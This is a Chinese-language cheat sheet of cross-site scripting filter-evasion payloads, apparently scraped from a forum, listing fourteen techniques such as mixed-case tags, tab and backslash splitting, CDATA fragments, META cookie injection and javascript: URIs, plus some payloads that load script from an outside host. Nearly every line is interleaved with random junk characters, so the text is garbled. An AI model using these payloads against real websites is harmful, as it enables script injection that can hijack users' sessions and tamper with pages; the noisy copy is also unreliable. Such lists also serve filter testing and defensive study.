1. 改变字符大小写
2 P2 d: S! h! k: ]' B# A! V9 X+ N2 M, E( C, Z4 P$ @
0 d' n* k8 u2 R9 M3 v. ]: P0 b& A/ e/ F1 ]8 D$ d
<sCript>alert(‘d’)</scRipT>8 `9 J4 P, L0 q
, W! M1 y* K6 Y- K+ b2 l4 g! w
2. 利用多加一些其它字符来规避Regular Expression的检查
( ]' F, x# L& u1 r6 e: e+ o* e# S0 E1 x' w
<<script>alert(‘c’)//<</script>- c/ a% E5 m" R9 `0 Q( E' o
# y j& j+ g* R" m <SCRIPT a=">" SRC="t.js"></SCRIPT>
/ e* G! M8 x0 }3 @, e) G' ^* A5 n% C! M8 e" u5 |
<SCRIPT =">" SRC="t.js"></SCRIPT>; m0 e9 h, S" \$ M
" W! e7 |7 e- W1 E
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>! h6 K$ s% T; R1 Q( S9 U! }' T0 F
8 z6 f% H6 g8 ]; k+ C$ o
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
: g" z% C: [/ p: `4 z2 m `( \" G2 |6 q5 f! }' n+ g$ ~
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
& R1 K5 F: ^$ m& D, e9 C2 e% g$ j, p7 S: \
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
8 X4 s6 w! \9 T* A) Q5 H' W6 T3 c# w, `
3. 以其它扩展名取代.js
9 Z7 x; T# ~7 r7 B: A* s
/ R" j8 A' P1 J9 X# s8 b <script src="bad.jpg"></script>2 N! E; U5 f0 E6 k
, ~, T0 s+ P# e! |3 h, ~
4. 将Javascript写在CSS档里. X- H3 g* T( H# c R7 i2 A9 R
1 T2 A) f' J$ p! I <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">3 @( D G) Q0 D% G% W: @* G4 U
7 Z5 o) I0 _/ Q: ~ example:
3 N4 M, V( ^1 s- i9 \2 v$ P8 C/ A) s3 y+ v5 k
body {1 e5 S9 ~2 Y( N; x
; d& N' Y) D) U* U+ v background-image: url(‘javascript:alert("XSS");’)
$ V5 W! b$ ^4 K! x8 C& b" b7 i" b! A1 F, {9 t9 R
}
1 ] I5 l4 T7 M$ b$ Y2 |* J( b) S% o
5. 在script的tag里加入一些其它字符
9 A$ ?, h3 e; ?; O
9 i3 D. d( Z( k4 }& g <SCRIPT/SRC="t.js"></SCRIPT>0 |$ P$ r$ _7 ], O3 e
8 e" G2 L) J. v
<SCRIPT/anyword SRC="t.js"></SCRIPT>
, l' [% z+ t$ U1 D4 b) v Y2 W
% Q2 |6 b8 q0 b4 m7 l. H6. 使用tab或是new line来规避
" \ Y: Q! e8 W; s* g! I: n5 s1 J& V3 W
<img src="jav ascr ipt:alert(‘XSS3′)">
1 l! B% h2 p3 n2 R$ r, C k
+ H- e' Q7 S8 \! H# Q <img src="jav ascr ipt:alert(‘XSS3′)">
; N) ~7 p& g& q! ], |! C5 _7 Y) y9 I$ k: m) V5 o
<IMG SRC="jav ascript:alert(‘XSS’);">
4 @3 a {7 t: m2 D4 N& A q% |
2 v: u! N; M3 L( o3 t -> tag& K5 T! V; H- c+ |
( D& Q; w6 C7 B( a
-> new line8 s1 b" b( W% ?' @% W
4 z3 @/ x8 m/ g& P4 L l: G7. 使用"\"来规避
9 j- A/ {8 q! T/ _% t! }- ] E. a5 A" Z$ K0 {% d8 s. E- F
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
0 G+ i: G0 [: k* ?3 u; r, o% X2 b6 {% e, }, p
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>3 h3 ~- [. [3 {; o
/ k u% m+ Y% `" O. e: G' _
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
4 ], h9 Z2 }+ V! g: Z( W" ?; A- k. h1 c, s( K5 m7 I
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
# x/ Q q& _2 I- o: F
1 J: x2 h, l0 @, V- V <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>$ I9 r7 |! K9 o$ P2 P$ f
5 \5 e( ^: z( Z. Z: w( W! A/ ?3 d
8. 使用Hex encode来规避(也可能会把";"拿掉)8 S- o0 L# S6 T( w% \
" j/ `$ w5 o- M6 b; k <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">/ g0 A" i3 ?2 p# B" K
, M4 g/ k2 d9 u
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
- p }1 [) D( J; z$ K8 b
* {: E* i% @( r& H$ W$ ?5 F <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
1 `* r" @" {; h( s; z0 g7 M
, j% S$ v8 g( f% r5 T 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
2 w6 H' _, e6 ~5 V* U8 B8 s" @ \8 s. K7 E4 o1 S
9. script in HTML tag$ |6 O" {6 n7 n$ N- v
8 w8 t3 M# |# c0 O9 L
<body onload=」alert(‘onload’)」>; z, ?& d$ C _! C
1 Z8 n( y2 \' K& I( C1 ^# Q+ D1 P onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload8 k3 N. H' ~# [. w- M
: }& T( O- _" \- R6 {# |' y10. 在swf里含有xss的code
. o3 k" E- M0 _/ i8 G' A( S5 f3 V+ u" k
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>$ g9 ^* v9 r( [9 n, G# a
- S# y( J% p6 @( n0 y; {1 ~11. 利用CDATA将xss的code拆开,再组合起来。
5 z$ J2 v: F3 I/ n8 d; u: v/ G' k5 Z, t6 C" Y
<XML ID=I><X><C>3 E/ T* L: I3 R* l) D
" M6 k2 J1 h* d6 [ <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
. J0 [& \% f3 F
# G# j W6 Y7 s. ]+ [( [: n/ k) E </C></X>
2 P; [, s& M5 i* Z& H5 _- m z
8 Q4 v, h" a/ f# D; [ </xml>' E% F) y' R* u
& V0 b( w" D3 U3 V, D <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>- W3 Y( E7 q, {
: o$ L" c# {1 p/ ?% E <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>. H# z, n1 q$ f O; U1 Z* R: B# |
: j c8 M- x0 u. [$ S& k8 I4 e <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
8 i, h+ r* S2 C( F$ B# t& x8 o# |9 d4 {: R1 `6 t
12. 利用HTML+TIME。
- b, Q( U, }4 b' A3 s2 r# A, b1 b
; o7 A/ x5 }- o! H0 h( k; `3 M <HTML><BODY>
* ?2 C) a3 Z/ E0 i. |- |3 X- |) W0 \
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
0 Z% [+ y. S/ P" u/ k4 v Q* y
0 l; K) K/ b$ @, D$ |( [" w <?import namespace="t" implementation="#default#time2">5 f4 j* W6 y9 U! S
" `, U& E$ |) A7 L <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
2 F3 B4 c9 {6 ^: g9 i& l3 O0 w7 L! N- p/ O$ c' Y5 P: I
</BODY></HTML>
" [6 ?# L1 J U& _. P% \/ n: ~* v/ G; v) z) A6 N4 j
13. 透过META写入Cookie。; i+ z: {& H; E7 V
# o; B1 Z7 Y# e4 j
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">. G5 K* \2 G5 w$ i5 x
- c5 k( G M5 ~. a
14. javascript in src , href , url! Y9 `& F$ Z4 a# ?
0 Y5 L, | N9 O) P1 [ <IFRAME SRC=javascript:alert(’13′)></IFRAME>
, J! Z2 L( U2 S) ^
+ a# _6 d: p" T! v2 E" k) e E <img src="javascript:alert(‘XSS3′)">
# s# B X9 {0 b. P Q$ @
) Y' M. U0 ^% W* z# V# S. w# J<IMG DYNSRC="javascript:alert(‘XSS20′)">
3 E$ d- Z* D9 x* @$ X% C: _% G8 f9 ?; X+ [
<IMG LOWSRC="javascript:alert(‘XSS21′)">
, H v* w0 w: K9 A9 g+ L: T& r
; I1 s3 }, M, P+ C <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
6 ~( c, {7 C; k" g/ r
' y- [9 w; g& G @6 z }& L/ O <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>% J2 X- h( P1 R$ M! O7 j( [
' _ U9 B/ I: b1 [/ N' \" J
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">$ r% B9 q) _; L: @6 O# G' [, q
" }, j7 n: v* ]: `! V <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">5 _; z# d8 w. D @
, s" }; K7 a4 H* J* d& U
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
2 n$ g- Z' ?) \3 u) l7 A4 G( W
3 p3 q: g: @' I _5 u </STYLE><A CLASS=XSS></A>
, }2 h6 ?& t3 x3 n" `# p9 B% m( x1 G. b5 D
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
; i8 V4 U8 d- T7 Y9 f7 J1 l" C( e( k1 {8 e
|